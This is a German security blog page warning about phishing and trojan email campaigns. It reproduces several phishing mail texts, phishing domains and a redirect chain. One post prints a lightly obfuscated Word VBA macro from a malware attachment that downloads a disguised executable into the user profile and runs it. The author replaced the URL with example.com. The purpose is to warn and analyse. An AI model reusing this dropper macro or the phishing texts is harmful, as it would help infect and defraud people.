Viren, Würmer und anderes Getier

Phishing: ONLINE-BANKING WIRD BLOCKIERT – AKTIVIERUNG NOTWENDIG

Seit etwa 18:00 Uhr sind Phishing Mails mit dem Betreff „ONLINE-BANKING WIRD BLOCKIERT – AKTIVIERUNG NOTWENDIG“ unterwegs. Ein erstes Opfer haben die Betrüger schon gefunden. Die Seite ist noch so jung, dass sie von Schutzprogrammen derzeit nicht erkannt wird.

Melden der Seite auf der Google Safe Browsing Phishing-Meldeseite hat leider keine sofortige Wirkung.

Mehr vielleicht morgen. Gute Nacht!

Jemand hat dir eine Videobotschaft hinterlassen

Wenn mir eine Fabienne Schulz eine Videobotschaft schreibt, dann doch bitte nur mir und nicht einem Thorsten W… Außerdem sollte sie wissen, dass Torsten nicht Fabienne Schulz heißt und sie selbst nicht „jemand“ ist, sondern Fabienne Schulz.

Wer in eine solch plumpe Falle tappt, der ist selber schuld.

Finger weg von solchen E-Mails. Insbesondere das der Flash-Player zur Zeit nicht koscher ist. Der Link führt allerdings über mehrere Umleitungen auf einen Fehler 403.

bit.ly/1vw1WmZ => dgnda.enmyas.su => b-unitd.com => tracker.brokeragecapital.com => bigprofitgenerator.com

Gute Nacht

(WordPress) Blogs gehackt – Fortsetzung 1

Paypal Betrugsversuch – Betrug! stammt natürlich von mir

Vor einigen Tagen habe ich über die Einbrüche in WordPress Blogs und andere Systeme berichtet. Leider – oder glücklicherweise – waren die Einbrüche immer schon entdeckt und beseitigt, wenn ich versucht habe auf die Seiten zuzugreifen. Heute ist es mir (endlich) gelungen einen Screenshot zu einer der gehackten Seiten zu bekommen. Bisher waren die Seiten immer schon entfernt, wenn ich darauf zugreifen wollte. Heute hat mein Firefox zwar einen Betrugsversuch beim Abruf gemeldet, aber dadurch habe ich mich nicht irritieren lassen (nur wer genau weiß,was er tut, sollte diese Meldung ignorieren). Die gefälschte Paypal Seite war noch online, deshalb hier nun der Screenshot und ein Bericht, wie es nach der ersten Seite weiter geht. Sieht doch sehr echt aus – ist allerdings kein Kunststück.
weiterlesen

SPAM: Ihr Finanzamt – ELSTER.DE

Gestern waren einige E-Mails im Postfach, die angeblich vom Finanzamt stammen. Ich habe zwei verschiedene Texte gefunden. Gemein ist allem Mails, dass sie einen Anhang mit Namen Erklarung09201429.zip enthalten, wobei die Zahl differieren kann. Das Zip-Archiv ist jedoch zerstört. Bei mir zeigt ark ein leeres Inhaltsverzeichnis an und unzip -l meldet:

End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.

Damit ist der Trojaner soweit ich es beurteilen kann wirkungslos. Es sein denn, er nutzt eine Sicherheitslücke bei ZIP-Dateien unter Windows aus.

Ansonsten nichts neues. Hier noch der Text der E-Mails.

Sehr geehrte Damen und Herren,

USt.-IdentNr.: DE13592

Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue (angebracht).

Ihre Datei finden Sie als D0C Datei im Anhang dieser E-Mail Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.

Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).

Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.

Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.

Mit freundlichen Grüßen

Ihr Finanzamt / Ihre Steuerverwaltung

HINWEIS:
Sie erhalten diese E-Mail, weil Sie bei der Datenübermittlung z.B. Ihrer Steuererklaerung die Mailbenachrichtigung auf diese E-Mailadresse gewünscht haben.
Bei Steuerbescheiden ist allein die Papierausfertigung rechtlich relevant.

Sehr geehrte Damen und Herren, irgendwas@example.com.

Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue.

Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.

Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).

——– Ihre Datei finden Sie als D0C-Datei im Anhang dieser E-Mail ——–

Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.
Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.

IdentNr: 4008371707
Mit freundlichen Grüßen
Ihr Finanzamt / Ihre Steuerverwaltung
elster.de

Trojaner: Keine Minute vergeht in der ich nicht an dich denke

oder ähnlich lauten die Betreff Zeilen einer derzeit laufenden Welle zur Verbreitung von Trojanern. Der Text beschränkt sich auf ein oder zwei Sätze, wie:

Keine Minute vergeht in der ich nicht an dich denke, und darum schenke ich dir meine Liebe, denn ich spür, ich gehör einfach zu dir. Ich lieb dich!

D. Bischof

Angehängt ist ein ZIP-Archiv 4180.zip, in dem sich wiederum ein MS-Word Dokument abactinal642.doc mit einem Makro befindet. In diesem Fall ist nur leicht obfuskiertes Makro, das eine als Bild getarntes Programm als FFFd.COM im Profil des Nutzers abspeichert und aufruft. Den Link im Quelltext habe ich geändert, er funktioniert bereits nicht mehr.

Sub hui()
Dim DMtjPKZbDiINOsDjnWMDQUaGD As String
Dim vNFhXFNV_TueQRFNXVYWLqYTecVHXURZUNBDUyA As Integer
URL = "http://www.example.com/fotos/rollover5.jpg"
DMtjPKZbDiINOsDjnWMDQUaGD = Environ("USERPROFILE")
Dim lOMwCMuTOYqPBHJNCl: Set lOMwCMuTOYqPBHJNCl = CreateObject("Microsoft.XMLHTTP")
Dim CSGDWYMVOOBASEd: Set CSGDWYMVOOBASEd = CreateObject("Adodb.Stream")
lOMwCMuTOYqPBHJNCl.Open "GET", URL, False
lOMwCMuTOYqPBHJNCl.Send
With CSGDWYMVOOBASEd
.Type = 1
.Open
.write lOMwCMuTOYqPBHJNCl.responseBody
.SaveToFile DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM", 2
End With
Shell DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM"
End Sub

Pishing: Sparkasse Online-Banking – Kundendienstes-Sicherheits-update

Unter der Adresse spkass.worldnet.us/update/ (IP: 94.249.139.6) ist zur Zeit wieder eine Sparkassen Online Banking Pishing Seite aktiv. Leider erkennen dies zur Zeit nur 3 von 53 Virenscannern. Über diese Mails habe ich bereits vor gut einem Jahr berichtet, deshalb erspare ich mir weitere Ausführungen zur Mail. Es hat sich im Prinzip nichts geändert.

Glücklicherweise hat jemand diesen Versuch schon erkannt und die Seite entfernt / umgelenkt.

Update: 27. Juni 2014
Für die ausgefallene Seite gibt es nun einen Ersatz unter: skk-54278bf4a28221d672.yolasite.com, aber auch diese ist nicht mehr verfügbar.

skk-54278bf4a28221d672.yolasite.com is an alias for ddos-1476621086.us-east-1.elb.amazonaws.com.
ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.243.34.189
ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.235.94.176

Trojaner: MS Word Anhänge

[tawarning] Die MS-Word Dokumente scheinen sich einer neuen Beliebtheit als Viren und Trojanerschleuder zu erfreuen. Heute fand ich zwei E-Mails mit einer anderen Variante im Postfach. Der Text der E-Mails ist minimal: „Trojaner: MS Word Anhänge“ weiterlesen

Vorsicht! Trojaner in vielen Gewändern

[tawarning] Derzeit sind die Trojaner in verschiedenen Gewändern, meist getarnt als Rechnungen für irgendwelche Bestellungen, die man nicht getätigt hat.

„Vorsicht! Trojaner in vielen Gewändern“ weiterlesen

SPAM / Trojaner: Setzen Sie bitte mit uns in Verbindung

[tawarning align=“right“] Word Makro Viren oder Trojaner habe ich schon lange nicht mehr gesehen – ihnen allerdings auch keine große Beachtung geschenkt. Heute haben kam folgende Mail in den Briefkasten:

„SPAM / Trojaner: Setzen Sie bitte mit uns in Verbindung“ weiterlesen

SPAM: Achtung – Kontoprobleme (Postbank)

[tawarning align=“right“] Mit nur einem Bild und einen Link in der E-Mail versuchen die Betrüger ihre Opfer über das Mobile TAN-Verfahren der Postbank zu melken. Grundsätzlich setzt dies voraus, dass die Empfänger externe Inhalte wie Bilder automatisch nachladen lassen, was keine sichere Einstellung des Mail-Clients ist. Automatisches Nachladen, so praktisch es auch ist, gehört auf den Schrotthaufen der unsicheren Funktionen.

In diesem Artikel will ich kurz beschreiben, wie es weitergeht, wenn man den Anweisungen der Betrüger folgt.

Das obige Bild ersetzt den Text in einer Mail. Ziel ist, nicht als Spam erkannt zu werden.

Mail Text

Zur Dokumentation führe ich den Text aus dem E-Mail-Bild hier an:

„SPAM: Achtung – Kontoprobleme (Postbank)“ weiterlesen

Januar 2021
Mittwoch, 20.01.
15.00 bis 16.15	Abgesagt: Kindergruppe Inga Klotz	Gnadenkirche Rheinbach weitere Infos